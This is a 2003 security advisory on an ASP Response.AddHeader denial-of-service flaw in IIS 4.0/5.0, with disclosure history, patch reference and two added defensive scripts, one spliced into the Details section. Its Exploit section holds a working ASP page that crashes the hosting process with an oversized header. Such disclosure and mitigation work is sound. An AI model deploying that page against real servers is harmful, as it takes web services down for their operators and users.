AQTRONIX Security Advisory AQ-2003-01
=====================================

Topic:              Microsoft Active Server Pages DoS
Release date:       18 April 2003
Affected Systems:   IIS 4.0, IIS 5.0 with ASP 3.0 installed (I did not test
                    previous versions of ASP). IIS 5.1 and 6.0 are not
                    vulnerable.
Mitigating factors: In order to execute the exploit a user would need to be
                    able to upload or change an ASP file on the affected
                    server and execute it.
Category:           Denial of Service
Vendor URL:         http://www.microsoft.com
Author:             Parcifal Aertssen

This document (and updates) is available at:
http://www.aqtronix.com/Advisories/AQ-2003-01.txt

CVE: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0225


Introduction
============

Microsoft's Active Server Pages contains a flaw through which an ASP
application can be crashed, which makes it usable as a denial of service.
A malicious user would need to be able to upload or change an ASP file and
execute it to exploit this bug.


Details
=======

Microsoft's Active Server Pages is a web technology that lets you easily
create dynamic web pages and complete web based applications. Pages are
coded in a scripting language like VBScript. To work with the web based
parts, ASP adds objects on which you can call methods and set properties.

One of the methods of the Response object contains a flaw that can be used
to crash the hosting process through excessive stack usage. The method in
question is Response.AddHeader(). It requires a header name and a header
value as its parameters. If one of those values is a very long string
(more than 350000 characters), the ASP application will crash as a result
of excessive stack usage. The dllhost.exe process hosting the ASP
application crashes, and as a result the web site using that application
and every other ASP application in the same pool crash as well.
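The following ASP page is an added example and is not part of the original advisory. It shows the unguarded Response.AddHeader call beside a wrapper that caps the length of the header name and value before the call is made, for pages that build header values from data they do not fully control. Note the scope: this protects legitimate pages from being tricked into sending an oversized header; it does nothing against an attacker who can already upload ASP, for whom the vendor patch or process isolation is the fix. The MAX_HEADER_LEN value, the X-Tracking-Id header and the "id" form field are assumptions chosen for illustration, not documented limits or names from the advisory.

```vbscript
<%
Option Explicit
' Added example (not from the advisory). The advisory reports the crash at
' roughly 350000 characters; MAX_HEADER_LEN is a deliberately conservative
' cap chosen for this example and is an assumption, not a documented limit.
Const MAX_HEADER_LEN = 4096

' Sends the header only if both name and value are within bounds.
' Returns True if the header was sent, False if it was rejected.
Function SafeAddHeader(headerName, headerValue)
    SafeAddHeader = False
    If IsNull(headerName) Or IsNull(headerValue) Then Exit Function
    If Len(headerName) = 0 Or Len(headerName) > MAX_HEADER_LEN Then Exit Function
    If Len(headerValue) > MAX_HEADER_LEN Then Exit Function
    ' Anything that passes the cap above is far below the ~350000-character
    ' threshold at which unpatched IIS 4.0/5.0 kills dllhost.exe.
    Response.AddHeader headerName, headerValue
    SafeAddHeader = True
End Function

' Vulnerable pattern: an oversized, attacker-influenced value goes straight
' to Response.AddHeader, which on unpatched IIS 4.0/5.0 crashes the
' hosting process and every ASP application sharing its pool:
'
'   Response.AddHeader "X-Tracking-Id", Request.Form("id")
'
' Bounded pattern: the same data passes through the cap first.
' "id" is an assumed form field name for illustration.
Dim tracking
tracking = CStr(Request.Form("id"))

If Not SafeAddHeader("X-Tracking-Id", tracking) Then
    ' Buffering is on by default in IIS 5, so the status can still be set.
    Response.Status = "400 Bad Request"
    Response.Write "Rejected header value"
    Response.End
End If
Response.Write "Header sent"
%>
```

The cap is applied to the header name as well as the value because the advisory states that either parameter being oversized triggers the crash.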
The next request for the web site will cause the ASP application to restart
(but you lose all application/session state and variables). If you have
application caching enabled, the next request will instead result in the
error message "The remote procedure call failed and did not execute." or
"The RPC server is unavailable."; further requests will eventually restart
the application.

Warning: if you run ASP "in-process", then inetinfo.exe will fail, which
means that your complete web server will crash (and restart if you have
IIS 5).


Exploit
=======

<%
Dim i, r
' Build a header value of 350000 characters: 3500 iterations,
' each appending a 100-character chunk
For i = 1 To 3500
    r = r + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
Next
' Passing the oversized value to Response.AddHeader is where the
' hosting process crashes
Response.AddHeader "random-header:", r
%>


Solution
========

At the initial release of this advisory there was no solution, and I
recommended limiting the DoS by running each ASP application as "Isolated"
(in its own process), so that only the crashed application's dllhost.exe
goes down rather than the other applications in the pool or the web server
itself.

Microsoft told me that a fix would be included in the next cumulative
patch, which they were going to release in February. They didn't; they said
they still had a lot of testing to do together with the other issues in the
cumulative patch. Since February I hadn't heard from them, but on 28 May
they released a patch, which can be found here:
http://www.microsoft.com/technet/security/bulletin/MS03-018.asp


History
=======

2002.11.04  Found the vulnerability.
2002.11.07  Mailed it to Microsoft.
2003.01.14  Received a private patch which worked.
2003.02.10  Received a mail that they still had a lot of testing to do.
2003.04.18  Released initial advisory.
2003.05.28  Microsoft released patch; updated solution section and changed
            affected systems because IIS 5.1 is not vulnerable. Also removed
            tested systems. Added link to CVE.


Disclaimer
==========

The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind. AQTRONIX is not liable for any direct
or indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory.
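The following script is an added example and is not part of the original advisory. It applies the interim mitigation from the Solution section, running an ASP application "Isolated" in its own dllhost.exe, through the IIS 5.0 ADSI provider from cscript.exe, and reports the application protection mode before and after. The metabase path IIS://localhost/W3SVC/1/Root (web site instance 1, application root) is an assumption; point it at the application you need to isolate. It requires administrative rights on the IIS 5.0 host and does not apply to IIS 4.0, whose ADSI application methods differ.

```vbscript
' Added example (not from the advisory): isolate one ASP application on
' IIS 5.0 with ADSI. Run with:  cscript.exe isolate_app.vbs
Option Explicit

' AppIsolated values in the IIS 5.0 metabase:
'   0 = in-process (inetinfo.exe; a crash takes the whole web server down)
'   1 = out-of-process / isolated (own dllhost.exe)
'   2 = pooled (shared dllhost.exe with every other pooled application)
Const APP_INPROC   = 0
Const APP_ISOLATED = 1
Const APP_POOLED   = 2

' Metabase path of the application to isolate. Assumption for this
' example: site instance 1, application at its root.
Const TARGET_PATH = "IIS://localhost/W3SVC/1/Root"

' Switches the application at metabasePath to isolated mode and returns
' True if the metabase afterwards reports AppIsolated = 1.
Function IsolateApplication(metabasePath)
    Dim app
    Set app = GetObject(metabasePath)
    ' AppCreate2 defines the application root with the given protection
    ' mode; an application that already exists at this key is converted.
    app.AppCreate2 APP_ISOLATED
    app.SetInfo
    ' Re-read from the metabase rather than trusting the cached object.
    Set app = GetObject(metabasePath)
    IsolateApplication = (app.AppIsolated = APP_ISOLATED)
End Function

' Human-readable description of a protection mode, with the blast radius
' of the AddHeader crash described in the advisory for each setting.
Function DescribeMode(mode)
    Select Case mode
        Case APP_INPROC
            DescribeMode = "in-process (whole web server at risk)"
        Case APP_ISOLATED
            DescribeMode = "isolated (only this application's dllhost.exe at risk)"
        Case APP_POOLED
            DescribeMode = "pooled (every pooled ASP application at risk)"
        Case Else
            DescribeMode = "unknown (" & mode & ")"
    End Select
End Function

WScript.Echo "Target: " & TARGET_PATH
WScript.Echo "Before: " & DescribeMode(GetObject(TARGET_PATH).AppIsolated)

If IsolateApplication(TARGET_PATH) Then
    WScript.Echo "After:  " & DescribeMode(GetObject(TARGET_PATH).AppIsolated)
Else
    WScript.Echo "Failed to isolate " & TARGET_PATH
    WScript.Quit 1
End If
```

Isolation limits the damage to the one application; the crash described in the advisory still occurs on an unpatched server, so the MS03-018 patch remains the actual fix.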